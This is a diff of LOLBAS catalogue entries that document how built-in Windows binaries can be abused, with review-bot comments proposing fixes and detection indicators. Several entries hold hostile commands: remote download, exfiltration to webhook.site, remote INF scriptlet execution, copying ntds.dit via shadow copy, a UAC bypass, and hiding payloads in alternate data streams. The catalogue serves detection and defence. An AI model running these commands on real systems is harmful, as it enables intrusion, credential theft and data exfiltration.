|
||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
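--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@@ -0,0 +1,26 @@
+---
+Name: cmdl32.exe
+Description: Microsoft Connection Manager Auto-Download
+Author: 'Elliot Killick'
+Created: '2021-08-26'
+Commands:
+  - Command: cmdl32 /vpn /lan %cd%\config
+    Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\cmdl32.exe
+  - Path: C:\Windows\SysWOW64\cmdl32.exe
+Detection:
+  - IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
+  - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
+Resources:
+  - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
+Acknowledgement:
+  - Person: Elliot Killick
+    Handle: '@elliotkillick'
+---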
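Review bot: This new entry omits the `Code_Sample:` key that the sibling new file (CertOC.exe) and the touched older entries all carry; if any consumer treats the key as required, this file will be the one that breaks, so add `Code_Sample: []` after `Full_Path:` or confirm the key is optional. The only resource is a link to the project's own pull request, which documents the submission rather than the technique; a reference describing the `/vpn /lan` download behaviour would serve defenders better. The `MitreLink:` uses the `/techniques/T1105/` URL form while CertOC.exe uses `/wiki/Technique/`; pick one form for new entries.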
@ -2,11 +2,11 @@
|
||||
Name: Cmstp.exe
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
@ -40,4 +40,4 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ConfigSecurityPolicy.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '04/09/2020'
|
||||
Created: 2020-09-04
|
||||
Commands:
|
||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Control.exe
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
@ -28,4 +28,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cscript.exe
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Desktopimgdownldr.exe
|
||||
Description: Windows binary used to configure lockscreen/desktop image
|
||||
Author: Gal Kristal
|
||||
Created: 28/06/2020
|
||||
Created: 2020-06-28
|
||||
Commands:
|
||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||
Description: Downloads the file and sets it as the computer's lockscreen
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||
Resources:
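Review bot: The two IOCs under Detection do not cover what the documented command actually exposes: it is launched through `cmd /c` after overriding `SYSTEMROOT`, with a `/lockscreenurl:` pointing at an external host. A command-line IOC is more actionable than the file-type one, e.g. `- IOC: desktopimgdownldr.exe launched with /lockscreenurl pointing at a non-corporate host, or spawned by cmd.exe rather than the settings UI`. The `SYSTEMROOT` override is presumably how the download is redirected to a user-writable directory; if so, saying that in the Description would explain to defenders why the file lands outside the normal lockscreen location.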
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Dfsvc.exe
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -17,14 +17,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
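Review bot: Detection is still the empty placeholder `- IOC:` (which loads as null) even though the command shows exactly what to look for: `rundll32.exe` invoked with `dfshim.dll,ShOpenVerbApplication` and a URL. Suggest replacing it with `- IOC: rundll32.exe command line containing dfshim.dll,ShOpenVerbApplication` and `- IOC: dfsvc.exe making outbound HTTP connections to non-corporate hosts`. The entry is named Dfsvc.exe but the documented command runs rundll32 — presumably dfsvc.exe is spawned as the ClickOnce host; stating that parent/child relationship in the Description would make the IOC traceable.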
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Diantz.exe
|
||||
Description: Binary that package existing files into a cabinet (.cab) file
|
||||
Author: 'Tamir Yehuda'
|
||||
Created: '08/08/2020'
|
||||
Created: 2020-08-08
|
||||
Commands:
|
||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\diantz.exe
|
||||
- Path: c:\windows\syswow64\diantz.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: diantz storing data into alternate data streams.
|
||||
- IOC: diantz getting a file from a remote machine or the internet.
|
||||
Resources:
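Review bot: Two documentation nits the lint pass left in place: `Compress taget file` in the first command's Description should read `target`, and the OperatingSystem value `Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.` ends with a period that no other entry in this commit uses (compare the Esentutl and Extrac32 lines). These strings are rendered verbatim on the site, so normalising them here is cheap.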
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diskshadow.exe
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
---
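Review bot: The IOC `Dnscmd.exe loading dll from UNC path` does not match the behaviour the Description documents: dnscmd.exe only registers the DLL as a DNS Service plug-in, and the load happens in the DNS service process (presumably dns.exe), not in dnscmd.exe, so a rule keyed on dnscmd.exe loading the DLL will never fire. Suggest `- IOC: dnscmd.exe executed with /config /serverlevelplugindll` and `- IOC: the DNS Server service process loading a DLL from a UNC path or from outside System32`. The registry value dnscmd writes is not shown in the hunk, so confirm the key name before adding it as a third IOC.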
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Esentutl.exe
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
@ -29,7 +29,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
@ -47,7 +47,7 @@ Commands:
|
||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||
Description: Copies a (locked) file using Volume Shadow Copy
|
||||
Usecase: Copy/extract a locked file such as the AD Database
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: Admin
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||
@ -55,10 +55,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
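Review bot: Detection is still the empty placeholder `- IOC:` although the documented commands give three concrete command-line signals: `/vss` combined with a source path ending in `ntds.dit` (the credential-theft case, listed with `Privileges: Admin`), a `/y` source on a UNC or webdav path, and a `/d` destination containing a `:` stream name. Suggest `- IOC: esentutl.exe with /vss and a path to ntds.dit or other locked system files`, `- IOC: esentutl.exe /y with a UNC or webdav source path`, and `- IOC: esentutl.exe /d destination containing an alternate data stream`. The Commands list for this entry starts before the first hunk.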
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Eventvwr.exe
|
||||
Description: Displays Windows Event Logs in a GUI window.
|
||||
Author: 'Jacob Gajek'
|
||||
Created: '2018-11-01'
|
||||
Created: 2018-11-01
|
||||
Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Privileges: User
|
||||
MitreID: T1088
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||
Detection:
|
||||
- IOC: eventvwr.exe launching child process other than mmc.exe
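Review bot: The `Code Sample:` → `Code_Sample:` rename is the substantive fix in this hunk; the old key with a space would not have matched the field name every other entry uses. The Description already names the registry value the bypass depends on, so it deserves its own IOC: `- IOC: creation or modification of HKCU\Software\Classes\mscfile\shell\open\command`. Note also that `Privileges: User` is only half the story — as I understand UAC, the silent high-integrity process only appears for accounts already in the local Administrators group — so stating that in the Usecase would stop the field being read as "any user".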
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Expand.exe
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: Copies source file to destination.
|
||||
@ -31,10 +31,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
@ -43,4 +43,4 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
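Review bot: Detection is an empty `- IOC:` placeholder while the documented command `expand \\webdav\folder\file.bat c:\ADS\file.bat` already shows what to key on: a UNC/webdav source path. Suggest `- IOC: expand.exe with a UNC or webdav source path`. The hunk header shows further commands above this point that are not visible here; if any of them write to a `file:stream` destination (as the Extrac32 and Makecab entries in this commit do), add the matching `- IOC: expand.exe writing to a destination containing an alternate data stream`.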
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Binary used for managing files and system components within Windows
|
||||
Author: 'Jai Minton'
|
||||
Created: '2020-06-24'
|
||||
Created: 2020-06-24
|
||||
Commands:
|
||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\explorer.exe
|
||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
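Review bot: `Description:` is left as a bare key, which loads as null rather than an empty string, and the lint pass only adjusted its whitespace; either fill it (Full_Path shows it is the Internet Explorer ExtExport binary) or at least write `Description: ''` so consumers get a string. The IOC text `Extexport.exe loads dll and is execute from other folder the original path` is also hard to parse; suggest `- IOC: Extexport.exe executed from a directory other than its Program Files location, or loading mozcrt19.dll, mozsqlite3.dll or sqlite.dll from a non-standard path`, with the DLL names taken from the Description in this hunk.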
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -39,10 +39,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
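Review bot: Both `Description:` and the `- IOC:` entry are bare keys in the new file, so the entry ships with a null description and a null indicator. The commands in the hunk support `- IOC: extrac32.exe with a destination path containing ':' (alternate data stream)` and `- IOC: extrac32.exe extracting a CAB from a UNC or webdav path`. For the description, `Description: Binary used to extract files from cabinet (.cab) archives` is consistent with the command lines shown.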
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: findstr.exe should normally not be invoked on a client system
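Review bot: `Description:` is a bare key (null) in the new file; the command in the hunk supports `Description: Searches for strings in files; output redirection can be abused to write data into alternate data streams`. The IOC `findstr.exe should normally not be invoked on a client system` is a weak signal since findstr is common in scripts, and the documented abuse is only visible on the parent shell's command line because the `>` redirection is handled by cmd.exe, not findstr. Suggest `- IOC: cmd.exe command line invoking findstr with /V and output redirected to a file:stream path`.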
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Forfiles.exe
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
@ -23,10 +23,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
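Review bot: The `- IOC:` placeholder is still empty while the documented command `forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe` is a straightforward proxy-execution pattern. Suggest `- IOC: forfiles.exe spawning a child process via /c` and `- IOC: forfiles.exe /c argument naming a binary outside the directory given by /p`.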
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ftp.exe
|
||||
Description: A binary designed for connecting to FTP servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-12-10'
|
||||
Created: 2018-12-10
|
||||
Commands:
|
||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||
Description: Executes the commands you put inside the text file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ftp.exe
|
||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd /c as child process of ftp.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: GfxDownloadWrapper.exe
|
||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||
Author: Jesus Galvez
|
||||
Created: Jesus Galvez
|
||||
Created: 2019-12-27
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||
@ -169,7 +169,7 @@ Full_Path:
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
